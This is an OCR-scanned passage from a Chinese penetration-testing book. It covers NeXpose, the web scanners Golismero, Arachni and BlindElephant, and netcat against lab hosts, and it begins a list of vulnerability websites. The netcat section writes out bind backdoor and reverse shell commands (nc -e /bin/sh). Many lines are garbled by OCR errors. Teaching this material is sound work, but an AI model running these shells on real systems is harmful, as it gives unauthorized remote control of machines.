3. 把 文件 nexposeconsole.rc 复 制 到 目录 /etc/init.d， 并 将 它 重 命名 。 
本 例 通 过 下 述 指令 把 它 重 命名 为 nexpose 。 

# cp [installation directory ]/nsc/nexposeconsole.rc /etc/init.d/nexpose 

4. 通过 下 壕 指 令 设置 启动 脚本 的 文件 权限 。 

# chmod +x /etc/init.d/nexpose 

5. 并 让 守护 进程 伴随 系统 局 动 。 

# update-rc.d nexpose defaults 


6. 可 以 通过 下 述 指令 控制 NeXpose 守 护 进 程 的 启动 、 终 止 和 重 


# /etc/init.d/nexpose <start|stop|restart> 

3. 登录 NeXpose 

如 欲 登录 到 NeXpose 共 享 版 控制 台 的 Web 界 面 ， 就 得 遵循 以 下 操作 
步 又 。 

1. 打开 浏览 器 并 访问 https:/127.0.0.1:3780。 如 果 没 有 出 现 意 外 错 
误 ， 您 融会 看 到 程序 的 登录 界面 。 首 次 打开 这 个 页 面 时 ， 浏 览 狠 将 会 
提示 Untrusted Connection 信息 。 您 需要 验证 证 书 并 把 这 个 这 个 网 站 和 


证 书 设置 为 永久 例外 的 规则 。 此 后 ， 您 束 再 也 不 会 看 到 这 个 警告 信息 
[fe 

2. 在 下 次 访问 控制 台 的 时 候 ， 控 制 台 将 会 进行 初始 设置 。 它 会 从 
Rapid7 的 服务 器 上 下 载 更 新 安装 包 。 更 新 程序 的 过 程 耗 时 较 长 。 

3. 每 程序 完成 初始 化 设置 ， 您 就 可 以 使 用 在 安装 过 程 中 设置 好 的 
用 户 名 和 密码 登录 。 如 图 A.5 所 示 ， 在 输入 用 户 名 和 密码 之 后 点 击 Log 
on 按钮 。 
@ | @ https://127.0.0.1 t v ©| [BY coog 


Bnexpose 


图 A.5 
4. 控制 台 将 会 提示 您 输入 激活 信息 。 如 图 A.6 所 示 ， 在 窗口 的 文 
本 框 内 输入 产品 许可 证 密 钥 之 后 ， 点 击 Activate with key 以 完成 激活 。 


Activate License 


Y) You need an active license for scanning and reporting. To activate 


automatically over the Internet, use a product key. If you do not have a key 


raniu t ^r 
iue» 


Enter a product key: | Activate with key 


图 A.6 

初次 登录 到 控制 台 的 时 候 ， 您 会 看 到 NeXpos 的 新 闻 页 面 。 这 个 页 
面 详 细 列 出 了 NeXpose 系 统 安装 了 的 更 新 信息 和 功能 改进 纪录 。 
得 到 这 个 页 面 ， 束 说 明 您 所 用 的 Kali Linux 系 统 已 经 成 功 地 安装 了 
NeXpose 共 享 版 程序 。 

KaliLinux 上 自 带 的 Iceweasel 浏 览 右 可 能 无 法 登录 到 NeXpose 的 安全 
icit MARAIS UL, PR Firefox 浏览 器 。 有 具体 安装 方 
法 请 参见 http://kali4hackers.blogspot.com/2013/05/installfirefox-on-kali- 
linux.html ° 

4. 使 用 NeXpose 

本 文 将 使 用 NeXpose 对 局 域 网 进行 一 次 简单 的 扫描 。 有 具体 方法 如 
下 o 

1. 如 图 A.7 所 示 ， 在 NeXpose 的 控制 面板 中 点 击 Home， 然 后 点 击 
New static site in Site Listing 以 扫 拉 指定 网 站 。 


«à 127.0.0.1 


x nexpose ft — assets Vulnerabilities Policies Reports Administration 
Home 


Site Listing 


(Je 


Current Scan Listing for All Sites 


There are no sites to display 


There are no scans to display 


Scan now 


图 A.7 

2. 此 后 ， 依 照 屏幕 上 的 向 导 对 网 站 的 配置 进行 设置 。 此 后 ， 在 菜 
单 中 依次 选中 Site configuration | General。 然 后 在 这 个 选项 卡 中 设置 网 
站 名 称 、 任 务 重要 程度 和 任务 描述 。 接 下 来 点 击 Next 按 钮 ， 在 下 一 个 
选项 卡 中 进行 设置 。 

3. 在 Assets 选项 卡 中 ， 指 定 扫描 目标 的 人 P 地 址 。 共 享 版 (CE) 的 
NeXpose 最 多 可 扫描 32 个 IP， 这 个 数字 也 是 目标 主机 数量 的 上 限 。 然 后 
点 击 Next 按 钮 ， 进 入 下 一 个 选项 卡 。 本 例 中 ， 我 们 将 使 用 NeXpose 7d 
描 运 行 Metasploitable 2 的 主机 ， 即 扫描 192.168.56.102。 具 体 设置 如 图 
A.8 所 示 。 


«€ à 127.0.0.1 ~E | 图 ~ A 
Previous Next Save Cancel 
General 
included Assets 
Assets 


The listed IP addresses and host names are included in this site 


scan Setup 


Credentials 192.168.56.102 


Web Applications 


Import list from file Browse... | No file selected 


Excluded Assets 


The listed IP addresses and host names will not be scanned as part of this site 


图 A.8 

4. 然后 您 需要 在 Scan Setup 中 进行 配置 。 此 处 ， 我 们 选用 Full audit 
的 全 面 扫描 模板 其 他 的 设置 束 采 取 程 序 的 默认 设置 。 然 后 点 击 Next 按 
fH, NEN BR—TXOUUR S 

5. 设置 好 选项 之 后 ， 要 点 击 Save 按钮 ， 保 存 各 项 配置 设 定 。 此 
后 ， 刚 才 保 存 的 扫 摘 任务 就 会 出 现在 程序 的 Site Listing P ° iE scanf] 
标 即 可 手动 局 动 扫 摘 任 务 。 

6. 启动 任务 之 后 ， 界 面 将 会 显示 Start New Scan 窗口 。 验 证 信息 的 
正确 性 之 后 ， 点 击 Start Now 按钮 运行 扫描 任务 。 

7. 如 图 A.9 所 示 ， 当 NeXpose 完成 扫描 任务 之 后 ， 它 的 控制 人 台 会 蚂 
m 


«là: 127.001 375 «Qe | 图 ~ e ald @ 
@nexpose $ = Assets Vulnerabilities Policies Reports Administration = 
Commevty 
Full audit o9 Y 

Scan Progress 

Scan Type Started Assets Vulnerabilities Elapsed Status 

Manual Wed 23 Oct 2013 09:25:07 AM WIT 1 288 | 11 minutes Completed successfully 
Discovered Assets 

Address Name Operating System Vulnerabilities $ Scan Duration 

Ubuntu Linux 8.04 288 | 10 minutes 


图 A.9 
8. ins 10 uid 目标 主机 的 漏洞 报告 。 


€ à nttps//127.0.0.13 


Vulnerabilities by Severity Vulnerabilities over Time 


Vulnerabilities 
v 


Assets by Vulnerability Severity vx Risk Over Time 


9. 如 需 查 看 详细 的 审计 报告 ， 可 以 在 顶级 菜单 里 点 击 Reports， 并 
运行 Report Generator (报告 生成 工具 ) 。 此 次 任务 的 审计 报告 如 图 
A.11 所 示 。 


1. Executive Summary 
This report represents a security audit performed by Nexpose from Rapid7 LLC. It contains confidential information about the state of 
your network. Access to this information by unauthorized personnel may allow them to compromise your network 


Site Name Start Time End Time Total Time Status 
metasploitable October 08, 2013 11:38, October 08, 2013 11:52, 14 minutes Success 
ICT ICT 


There is not enough historical data to display risk trend. 


The audit was performed on one system which was found to be active and was scanned. 


Vulnerabilities by Severity 


There were 286 vulrerabilties found during this scan. Of these, 69 were crtical vulnerabilties. Critical vulnerabilties require immediate 
图 A.11 
以 上 就 是 NeXpose 共享 版 程序 的 简要 介绍 。 下 一 个 小 节 将 介绍 几 

款 Web 应 用 程序 的 测试 工具 e 

A.3 Web 应 用 程序 测试 工具 

A.3.1 Golismero 

Golismero 是 一 款 开 源 的 Web 应 用 程序 测试 框架 ， 它 由 Python 语 言 编 
写 。Golismero 的 主要 特征 如 下 所 示 。 

e 它 能 收集 、 上 整理 多 款 著 名 测试 程序 (例如 sqlmap ^ xsser ^ 
openvas ^ dnsrecon#lltheharvester) 的 扫描 结 

e 它 整合 了 CWE、CVE 和 OWASP 的 数据 库 。 

Kali Linux 安 装 的 Golismero 版 本 过 老 ， 不 能 进行 Web 应 用 程序 的 相 
关 测 试 。 要 安装 最 新 版 本 的 Golismero 程序 ， 请 通过 
https://github.com/golismero/golismero/archive/master.Zip FE% ° 
然后 将 之 解压 缩 。 接 下 来 ， 可 通过 下 述 指令 查看 Golismero 的 帮助 


o 


= 
Ava 


python golismero.py -h 
程序 显示 的 帮助 信息 如 图 A.12 所 示 。 


root@kali:~/golismero-master# python golismero.py -h 

usage: golismero.py [-h] [-f FILE] [--config FILE] [-p NAME] [--ui-mode MODE] [-v] [-q] 
[--color] [--no-color] [--audit-name NAME] [-db DATABASE] [-nd] 

[-i FILENAME] [-ni] [-o FILENAME] [-no] [--full] [--brief] 
[--max-connections MAX CONNECTIONS] [--allow-subdomains] 
[--forbid-subdomains] [-r DEPTH] [-1 MAX LINKS] [--follow-redirects] 
[--no-follow-redirects] [--follow-first] [--no-follow-first] [-pu USER] 
[-pp PASS] [-pa ADDRESS:PORT] [--cookie COOKIE] [--cookie-file FILE] 
[--persistent-cache] [--volatile-cache] [-a PLUGIN:KEY-VALUE] [-e PLUGIN] 
[-d PLUGIN] [--max-concurrent N] [--plugins-folder PATH] 

COMMAND [TARGET [TARGET ...]] 


available commands: 


SCAN: 
Perform a vulnerability scan on the given targets. Optionally import 
results from other tools and write a report. The arguments that follow may 
be domain names, IP addresses or web pages. 


PROFILES: 

Show a list of available config profiles. This command takes no arguments. 
PLUGINS: 

Show a list of available plugins. This command takes no arguments. 


图 A.12 
扫 摘 肝 个 网 站 的 指令 如 下 所 示 。 
python golismero.py 192.168.1.138 -o 192-168-1-138.html 
扫 摘 结 有 末 如 图 A.13 所 示 。 


root@kali:~/golismero-master# python golismero.py 192.168.1.138 -o 192-168-1-138.html 


| GoLismero 2.0.0b2 - The Web Knife 
| Contact: golismero.project<@>gmail .com 


| 
| Daniel Garcia Garcia a.k.a crOhn (@ggdaniel) 
| Mario Vilas (@Mario_Vilas) 


A 


GoLismero started at 2013-10-08 11:36:35.219935 

[*] GoLismero: Audit name: golismero-JCioyOLB 

[*] GoLismero: Audit database: golismero-JCioyOLB.db 

[*] GoLismero: Added 2 new targets to the database. 

[*] GoLismero: Launching tests... 

[*] Freegeoip.net connector: Started. 

[*] Freegeoip.net connector: Finished. 

[*] 0S fingerprinting plugin: Started. 

[*] 0S fingerprinting plugin: Finished. 

(*] Robots.txt Analyzer: Started. 

{*] Suspicious URL: Started. 

[*] Suspicious URL: Finished. 

[*] Web Server fingerprinting plugin: Started. 

[*] OS fingerprinting plugin: Started. 

(*] Web Spider: Started. 

[*] Web Spider: Spidering URL: 'http://192.168.1.138/' 

[*] Robots.txt Analyzer: Finished. 

[*] Web Spider: No links found in URL: http://192.168.1.138/ 
[*] Web Server fingerprinting plugin: 11.11% percent done... 
*] Web Spider: Finished. 


图 A.13 
它 生成 的 扫描 报告 如 图 A.14 所 示 。 


golismero-JCioyOLB 


Summary 


Audited targets [7 41% 


Start date Oct. 8, 2013, 11:36 am 

End date Oct. 8, 2013, 11:39 a.m 

Execution time 

Total vulnerabilities Found «D 
图 A.14 


A.3.2 Arachni 


Arachni (http://www.arachni-scanner.com/) 是 一 款 由 Ruby 语 言 编 写 


的 扫描 Web 应 用 程序 的 工具 。 它 采取 模块 化 设计 ， 人 性 能 卓越 。 

Arachni 的 功能 十 分 强大 ( http://www.arachni-scanner.com/about/ 
features) ， 它 能 够 : 

e 文 持 SSL; 

e 在 审计 的 过 程 当 中 检测 到 注销 状态 并 能 重新 登录 ; 

e 高 速 处 理 HTTP 请 求 ; 

e 进行 并 发 扫描 ; 

e 充分 利用 有 限 带宽 精确 识别 被 测 目标 的 软件 平台 

e 排查 各 种 漏洞 ， 可 检测 SQL 注入 漏洞 、CSRF、 代 码 注 入 、 
LDAP 注入 、 路 径 笛 历 、 文 件 包 含 和 XSS 问 题 。 

美中不足 的 是 ，Arachni 也 有 很 多 局 限 ( httpz//www.arachni-scan 
ner.com/about/limitations/) : 

e ^ 3: $EDOM ` JavaScript ^ AJAX 和 HTML5; 

e 它 的 报告 可 能 有 假 阳 性 的 误 报 。 

Kali Linux 默认 安装 的 是 0.4.4 版 的 Arachni 程序 ° 

下 述 指令 将 显示 帮助 信息 ， 并 列 出 Arachni 文 拧 的 各 种 指令 。 

arachni -h 

列举 所 有 模块 的 指令 如 下 所 示 。 

arachni --lsmod 

上 壕 指 令 的 运行 结果 如 图 A.15 所 示 。 


[~] Available modules: 


[*] x forwarded for access restriction bypass: 
Name: X-Forwarded-For Access Restriction Bypass 
Description: Retries denied requests with a X-Forwarded-For header 
to trick the web application into thinking that the request originates 
from localhost and checks whether the restrictions was bypassed. 
Elements: server 


Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail .com> 
Version: 6.1 
Targets: 
[~] Generic 
Path: /usr/share/arachni/system/gems/gems/arachni-0.4.4/modules/recon/x forwarded for access restriction bypass.rb 


[*] htaccess limit: 


Name : .htaccess LIMIT misconfiguration 

Desc ription: Checks for misconfiguration in LIMIT directives that blocks 
GET requests but allows POST. 

Elements: server 

Author: Tasos "Zapotek" Laskos «tasos.laskosegmail.com» 

Version: 0.1.5 


图 A.15 
出 于 演示 的 需要 ， 我 们 使 用 Arachni 扫描 一 个 叫 作 DVWA ( 
http://www. dvwa.co.uk/) 的 Web 应 用 程序 ， 并 把 扫描 报告 保存 为 HTML 
文件 。 假 如 运行 DVWA 程 序 的 主机 使 用 的 卫 是 192.168.2.22， 那 么 我 们 
需要 使 用 的 指令 如 下 所 示 。 
arachni http://192.168.2.22/dvwa/ --report=html: 
outfile=./192-168-2-22-dvwa.html 


扫 摘 报告 将 会 保存 在 目 孙 /usr/share/arachni/bin/ 中 。 使 用 浏览 器 打 
开 这 个 报告 文件 ， 将 会 看 到 如 图 A.16 所 示 的 信息 。 


Summary 


Graphs Issues (10] 
Search issues (Submit empty query to show all again.) 


[1] HTTP TRACE (Trusted — Severity: Medium) [6] Insecure cookie (Trusted — Severity: 
Informational) 
The HTTP TRACE method is enabled. This misconfiguration 


The logged cookie is allowed to be served over an 
can become a pivoting point for a Cross-Site Scripting gge E 


unencrypted channel which makes it susceptible to sniffin 
(XSS) attack yp g 


In cookie input security using GET at http://192.168.2.22 


In server using TRACE at http://192.168.2.22/ dvwa/ Idvwal 


[2] Unencrypted password form (Trusted 


Severity: Medium) [7] HttpOnly cookie (Trusted — Severity: 


Informational) 
Tj I fj 
Transmission of password does not use an encrypted The logged cookie does not have the HttpOnly flag set which 


channel. makes it succeptibie to manipiation via client-side code 


图 A.16 
A.3.3 BlindElephant 
BlindElephant 是 一 球 可 对 Web 应 用 程序 进行 指纹 对 比 的 识别 程序 。 
这 款 工 具 通 过 扫描 某 些 固定 位 置 的 静态 文件 ， 把 这 些 文件 的 哈 希 值 与 

各 版 本 Web 应 用 程序 的 那些 文件 的 哈 希 值 进行 比 对 ， 从 而 鉴定 被 测 Web 
应 用 程序 的 版 本 信息 。 

这 种 识别 技术 的 鉴定 速度 快 ， 带 宽 消 耗 低 ， 无 危害 ， 通 用 性 高 且 
高 度 上 自动 化 。 

如 需 显 示 BlindElephant 的 帮助 文件 ， 可 使 用 以 下 指令 

BlindElephant.py -h 

上 述 指令 将 会 在 屏幕 上 显示 出 程序 的 帮助 信息 。 

如 需 了 解 BlindElephant 支 持 的 Web 应 用 程序 ， 或 者 需要 列 出 它 所 支 
持 的 插件 ， 可 使 用 下 述 指令 

BlindElephant.py -l 

上 述 指 令 的 运行 结果 如 下 ( 见 图 A.17) ° 


root@kali:-~# BlindElephant.py -l 
urrently configured web apps: 15 
onfluence with O plugins 
dien with 16 plugins 

admin menu 
cck 

- date 
filefield 
google analytics 
imageapi 
imagecache 

- imagefield 
imce 
imce swfupload 
pathauto 
print 
spamicide 
tagadelic 
token 
views 

mtu with © plugins 
iferay with © plugins 
ediawiki with O plugins 


oscommerce with 6 plugins 
phpbb with O plugins 


图 A.17 
如 欲 鉴定 目标 网 站 使 用 的 哪个 版 本 的 WordPress 程 序 ， 可 使 用 下 述 


KA 
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BlindElephant.py target wordpress 
ESRAR P o 
Hit http://target/readme.html 


Possible versions based on result: 3.1.3, 3.1.3-IIS 

Hit http://target/wp-includes/js/tinymce/tiny mce.js 

Possible versions based on result: 3.1.1, 3.1.1-IIS, 3.1.1-RC1, 
3.1.1-RC1-IIS, 3.1.2, 3.1.2-IIS, 3.1.3, 3.1.3-IIS, 3.1.4, 3.1.4-IIS 


Possible versions based on result: 3.1, 3.1.1, 3.1.1-IIS, 3.1.1-RC1, 

3.1.1-RC1-IIS, 3.1.2, 3.1.2-IIS, 3.1.3, 3.1.3-IIS, 3.1.4, 3.1.4-IIS, 

3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-IIS, 3.1-RC1, 

3.1-RC2, 3.1-RC2-IIS, 3.1-RC3, 3.1-RC3-IIS, 3.1-RC4, 3.1-RC4-HS 

Fingerprinting resulted in: 

3.1.3 

3.1.3-IIS 

Best Guess: 3.1.3 

BlindElephant 对 被 测 #4) WordPress 程序 的 鉴定 结果 是 3.1.3 版 程 
序 。 依 据 版 本 信息 ， 我 们 可 找到 相应 版 本 存在 的 安全 漏洞 。 

A.4 网 络 工具 

本 市 将 要 介绍 一 款 多 用 途 的 网 络 工 具 。 有 些 人 把 它 叫 做 TCP/IP 协 
议 的 瑞士 军刀 ， 它 的 名 字 就 是 NetCat (http://netcat.sourceforge.net/) ° 

A.4.1 netcat 

netcat 是 一 款 借 助 TCP 连 接 或 UDP 协 议 读 写 数据 的 工具 。 默 认 情 况 
下 ， 它 使 用 TCP 协 议 传递 数据 。 无 论 是 人 工 输入 的 指令 ， 还 是 其 他 的 程 
序 和 脚本 ， 都 可 以 调用 这 款 工具 传输 数据 。 第 11 章 介绍 的 ncat 程 序 是 
netcat 的 改进 版 本 。 您 应 当 注意 的 是 ，netcat 不 会 对 传输 的 数据 进行 加 


RS 
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渗透 测试 人 员 多 数 都 了 解 netcat 各 种 不 同 的 用 法 。 这 球 工 具 小 巧 ， 
可 移植 性 高 ， 功 能 强大 ， 可 以 在 被 测 主机 上 单独 运行 。 下 面 将 针对 渗 


透 测试 工作 的 需要 演示 Netcat 程序 的 使 用 技巧 。 后 文 的 网 络 配置 情况 
AM 

e SSH Web 服务 器 的 IP 地 址 是 192.168.2.22; 

e 客户 端的 IP 地 址 是 192.168.2.23 。 

1. 打开 连接 

netcat 可 以 替代 telnet 的 客户 端 程序 ， 直 接连 接 到 指定 卫 地 址 的 任意 
端口 。 这 是 它 的 最 向 单 的 用 法 。 

例如 ， 可 使 用 下 述 指 令 连 接 到 192.168.2.22 的 22 端 口 (SSH HIR 
$$) ° 

# nc 192.168.2.22 22 

远程 服务 器 的 回复 信息 如 下 。 

SSH-2.0-OpenSSH 4.7p1 Debian-8ubuntul 

然后 ， 我 们 使 用 组 合 键 Ctrl+C 关 闭 连 接 。 

2. 提取 服务 标题 

您 可 以 通过 前 一 个 例子 里 用 到 的 技术 提取 多 数 网 络 服务 的 服务 标 
题 (service banner) 。 不 仅 SSH 服 务 有 标志 性 的 标题 ， 其 他 的 网 络 服务 
多 数 都 有 相应 的 服务 标题 。 如 果 某 个 端口 运行 着 HITP 服 务 ， 那 么 您 需 
要 使 用 HTTP 指 令 提取 标题 信息 。 

例如 ， 我 们 可 使 用 下 述 指令 提取 Web 服 务 软 件 的 版 本 信息 和 操作 系 
统 信息 。 

# echo -e "HEAD / HTTP/1.0\n\n" | nc 192.168.2.22 80 

得 到 服务 器 响应 如 下 。 

HTTP/1.1 200 OK 

Date: Tue, 08 Oct 2013 14:09:14 GMT 

Server: Apache/2.2.8 (Ubuntu) DAV/2 

X-Powered-By: PHP/5.2.4-2ubuntu5.10 


Connection: close 


Content-Type: text/html 

Ex EB], Web 服务 的 后 台 程 序 是 Apache， 主 机 的 操作 系统 
是 Ubuntu 5.10 ° 
3. [Bj Za I-A HR AS as 
如 果 要 使 用 netcat 程 序 在 1234 端 口上 运行 聊天 服务 器 ， 可 使 用 下 述 


AS 
# nc -l -p 1234 
此 后 ， 您 就 可 以 使 用 telnet、netcat 或 者 相似 的 软件 ， 连 接 到 服务 端 
程序 。 


$telnet 192.168.2.22 1234 

随后 所 输入 的 所 有 字符 ， 都 将 显示 在 服务 端的 netcat 程 序 里 。 

这 实际 上 建立 了 一 种 简单 的 双向 通信 连接 。 

如 需 关 闭 连接 ， 可 使 用 组 合 键 Ctrl+C。 

4. 文件 传输 

如 果 要 传递 一 个 名 为 thepass 的 文件 ， 可 在 接收 端 运行 下 述 指令 。 

# nc -l -p 1234 > thepass.out 

然后 在 发 送 端 运 行 下 述 指令 。 

# nc -w3 192.168.2.22 1234 < thepass 

从 发 送 端 将 会 把 文件 thepass finalin ° Ma, Beo zx 
件 储存 为 thepass.out ° 

我 在 渗透 测试 任务 中 使 用 netcat 传 输 过 文件 。 当 利用 了 被 测 主机 的 
漏洞 并 建立 reverse shell 之 后 ， 用 它 传递 了 文件 。 泣 运 的 是 ， 被 测 主机 
装 有 netcat 程 序 ， 用 它 传递 文件 并 没有 发 生 问 题 。 

5. 端口 扫描 

netcat 还 可 以 胜任 简单 的 端口 扫描 工作 。 本 例 将 使 用 netcat 程 序 扫 摘 
被 测 主机 的 TCP 1~1000 端 口 ， 同 时 指定 程序 : 显示 详细 信息 Cv) 


禁止 解析 DNS 名 称 (Cn) 、 不 发 送 任何 数据 Cz) 、 超 时 设置 为 1 秒 (- 
w1) 。 综 合 以 上 要 求 ， 我 们 需要 使 用 的 指令 如 下 所 示 。 

# nc -n -v -z -w 1 192.168.2.22 1-1000 

上 述 指令 的 运行 结 采 如 下 。 

(UNKNOWN) [192.168.2.22] 514 (shell) open 

(UNKNOWN) [192.168.2.22] 513 (login) open 

(UNKNOWN) [192.168.2.22] 512 (exec) open 

(UNKNOWN) [192.168.2.22] 445 (microsoft-ds) open 

(UNKNOWN) [192.168.2.22] 139 (netbios-ssn) open 

(UNKNOWN) [192.168.2.22] 111 (sunrpc) open 

(UNKNOWN) [192.168.2.22] 80 (http) open 

(UNKNOWN) [192.168.2.22] 53 (domain) open 

(UNKNOWN) [192.168.2.22] 25 (smtp) open 

(UNKNOWN) [192.168.2.22] 23 (telnet) open 

(UNKNOWN) [192.168.2.22] 22 (ssh) open 

(UNKNOWN) [192.168.2.22] 21 (ftp) open 

可 见 ， 主 机 192.168.2.22 开 放 了 多 个 端口 (514 ` 513 ` 512 ^ 445 ` 
139、111、80、53、25、23、22、21) œ 

虽然 netcat 确 实 具有 端口 扫描 的 功能 ， 但 是 本 书 建 议 您 还 是 使 用 
Nmap 进 行 端口 扫描 。 在 这 方面 ， 毕 竟 Nmap 的 功能 更 为 讲究 。 

6. backdoor shell 

我 们 同样 可 以 使 用 netcat 程 序 实 现 一 种 可 获取 shell 的 后 门 。 这 种 情 
况 下 ， 要 指定 程序 的 监听 端口 (通过 -p 选 项 设置 ) 和 shell (通过 -e 选 项 
WE) e 

如 果 要 在 1234 号 端口 上 打开 /bin/sh 的 shell， 可 使 用 下 述 指令 。 

# nc -e /bin/sh -l -p 1234 


此 后 ， 我 们 在 客户 端 上 使 用 telnet 或 相似 的 客户 端 程序 连接 到 服务 
y INS 

telnet 192.168.2.22 1234 

f£telnetZz ^ 9m fg Fr daz TR SCR Za, fats n] DAE ISEIXUT shell Æ 
服务 端的 Linux 主 机 上 使 用 任意 Linux 指 令 。 

例如 ， 我 们 首先 通过 id 指令 获取 登 孙 账号 的 相关 资料 ， 可 得 到 如 下 


uid=1000(msfadmin) gid=1000(msfadmin) 
groups-4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44( 


video), 
46(plugdev),107(fuse),111(Ipadmin),112(admin),119(sambashare),1000(msf 
admin) 

fe PR, RINEL PF utes a-Si BI H RAPA OCF ° 

Is -al 

上 述 指令 的 运行 结 采 如 下 。 

total 9276 


drwxr-xr-x 10 msfadmin msfadmin 4096 2013-09-16 18:40 . 
drwxr-xr-x 6root root 4096 2010-04-16 02:16 .. 
lrwxrwxrwx 1root root 9 2012-05-14 00:26 .bash 
history -> /dev/null 

drwxr-xr-x 3 msfadmin msfadmin 4096 2013-09-08 03:55 cymothoa 
1-beta 

-rw-r--r-- 1 msfadmin msfadmin 18177 2013-09-08 03:36 cymothoa 
1-beta.tar.gz 

drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc 
-rw-r--r-- 1 msfadmin msfadmin 1669 2013-08-27 10:11 etc-passwd 
-rw-r--r-- 1 msfadmin msfadmin 1255 2013-08-27 10:11 etc-shadow 


drwxr-xr-x 5 msfadmin msfadmin 4096 2013-06-12 01:23 .fluxbox 

drwx------ 2 msfadmin msfadmin 4096 2013-09-14 08:25 .gconf 

drwx------ 2 msfadmin msfadmin 4096 2013-09-14 08:26 .gconfd 

-IW------- 1 root root 26 2013-09-14 08:57 .nano_his 

tory 

-rwxr-xr-x 1 msfadmin msfadmin 474740 2013-09-14 09:38 ncat 

drwxr-xr-x 21 msfadmin msfadmin 4096 2013-09-14 09:31 nmap- 
6.40 

-Crw-r--r-- 1 msfadmin msfadmin 586 2010-03-16 19:12 .profile 

ls 指令 的 运行 结果 会 回 显 在 客户 端的 屏幕 上 。 如 果 在 服务 端 是 以 
root 权限 运行 的 netcat 程 序 ， 那 么 连接 到 这 个 后 门 的 客户 端 用 户 同 样 具 
有 服务 端 主机 的 全 部 root 权 限 。 不 过 shell 并 不 是 真正 的 终端 ， 也 就 是 说 
您 无 法 在 shell 上 运行 su 之 类 的 指令 。 

需要 注意 的 是 ，netcat 不 会 进行 加 密 连 接 ; 此 外 ， 只 要 发 现 了 后 门 
的 端口 ， 束 可 连接 到 相应 端口 ， 对 服务 端 主 机 进行 控制 。 

7. reverse shell 

netcat HJ reverse shell 工作 模式 和 上 一 个 例子 的 连接 模式 恰恰 相 
反 。 刚 才 的 例子 中 ， 我 们 在 服务 端 开 放 了 一 个 端口 ， 并 把 shell 绑 定 到 
这 个 端口 。reverse shell 则 是 让 远程 主机 (shell 的 服务 器 端 ) 连接 到 我 
们 所 用 的 主机 〈 即 shell 的 客户 端 ) 。 

目 完 ， 我 们 在 客户 端 主机 上 运行 下 述 指 令 。 

# nc -n -v -l -p 1234 

AERA arma PXRTH e 

# nc -e /bin/sh 192.168.2.23 1234 

如 宁 客 户 端 主机 提示 以 下 信息 ， 则 说 明 我 们 已 经 连接 到 了 reverse 
shell ° 

connect to [192.168.2.23] from (UNKNOWN) [192.168.2.22] 53529 


此 后 ， 您 可 以 在 客户 端 主 机 向 服务 器 端 主机 发 布 任意 指令 。 
例如 ， 可 在 客户 端 程序 里 使 用 下 述 指 令 查 看 远程 主机 的 了 地 址 。 
ip addr show 
上 述 指令 的 运行 结 采 如 下 。 
1: lo: <LOOPBACK,UPLOWER_UP> mtu 16436 qdisc noqueue 
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 
inet 127.0.0.1/8 scope host lo 
inet6 ::1/128 scope host 


valid lft forever preferred lft forever 
2: eth0O:<BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 
qdisc pfifo fast qlen 1000 
link/ether 08:00:27:43:15:18 brd ff: ff:ff:ff: ff: ff 
inet 192.168.2.22/24 brd 192.168.2.255 scope global eth0 
inet6 fe80::a00:27ff:fe43:1518/64 scope link 
valid lft forever preferred lft forever 
在 客户 端 程序 里 ， 可 执行 远程 主机 支持 的 所 有 指令 。 
A.5 本 章 小 结 
本 章 介 绍 了 数 款 可 能 会 在 渗透 测试 的 工作 中 使 用 到 的 工具 。 有 些 
软件 并 没有 被 Kali Linux 收 录 ， 而 且 Kali 收 录 的 软件 其 版 本 可 能 版 本 不 
够 新 。 不 过 ， 正 如 我 们 看 到 的 那样 ， 更 新 或 安装 软件 的 过 程 并 不 复 
杂 。 本 章 介 绍 了 4 类 软件 : 信息 侦察 工具 、 漏 洞 扫 描 程序 、Web 应 用 程 
序 工 具 和 网 络 工具 。 
本 文 介绍 的 工具 都 是 广 受 欢迎 的 、 功 能 强大 且 成 熟 度 很 高 的 程 


序 。 


本 章 首先 对 这 些 工具 进行 简要 介绍 ， 而 后 演示 了 其 安装 和 配置 方 
法 ， 并 讲解 了 它们 的 各 种 使 用 方法 。 
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本 章 将 向 读者 介绍 各 种 有 助 于 拓展 渗透 测试 知识 的 网 络 资源 。 这 
EE UR AEA ap ALA BILE: 

e AA ^ BREE IMA ye: 

e 采购 漏洞 和 exploit 的 公司 ; 

e 2€ 2] 3 [h] LE ` exploit HA 22:35 3 EP P] Yd ; 

e 练习 渗透 测试 的 测试 环境 ; 

e 在 渗透 测试 过 程 中 时 和 常 需要 参照 的 常见 端口 列表 。 

本 文 介绍 的 各 个 网 站 主要 适合 初学 者 学 习 之 用 ， 而 且 有 关内 容 并 
不 是 面面俱到 。 建 议 想 要 深造 的 读者 使 用 搜索 引擎 查找 适合 自己 水 平 
的 网 络 资源 。 

B.1 发 布 、 退 中 漏洞 的 网 站 

本 节 列 出 的 线 上 资源 有 助 于 读者 退 踪 漏洞 信息 。 许 多 网 站 都 允许 
网 友 发 布 他 们 发 现 的 安全 漏洞 。 您 也 可 以 在 这 些 公共 、 私 人 组 织 的 网 
站 上 发 布 您 挖掘 出 来 的 漏洞 信息 。 其 中 一 些 网 站 还 会 给 发 布 漏洞 的 安 
全 人 员 文 付 报酬 ， 以 报答 发 布 人 员 在 挖掘 漏 洞 、 人 研发 PoC 代 码 的 时 候 人 花 
费 的 时 间 和 精力 。 

我 们 整理 了 部 分 发 布 、 奶 踩 漏洞 信息 鸭 网 站 。 


URL 描述 

http://www.osvdb.org/ 开源 漏洞 数据 库 
http://www.securityfocus.com/ 安全 焦点 提供 公开 漏洞 、 邮 件 列 表 和 安全 工具 
http://www.packetstormsecurity.org/ exploit、 公 告 、 工 具 和 白皮书 
http://www.vupen.com/ 安全 公告 、PoC、 邮 件 列表 和 研究 类 期 刊 
http://www.vupen.com/ 安全 公告 、PoC、 邮 件 列表 和 研究 类 期 刊 


URL 


http://www.secunia.com/ 
http://www.exploit-db.com/ 


http: //web.nvd.nist.gov/view/vuln/search 
https://access.redhat.com/ 
security/updates/advisory/ 
http://lists.centos.org/ 
pipermail/centos-announce/ 


http://www.us-cert.gov/ncas/alerts 


http://xforce.iss.net 


http://www.debian.org/security/ 


http://www.mandriva.com/en/support/ 
security/ 


https://www.suse.com/support/update/ 


http://technet.microsoft.com/en-us/ 
security/advisory 


http://technet.microsoft.com/en-us/ 
security/bulletin 


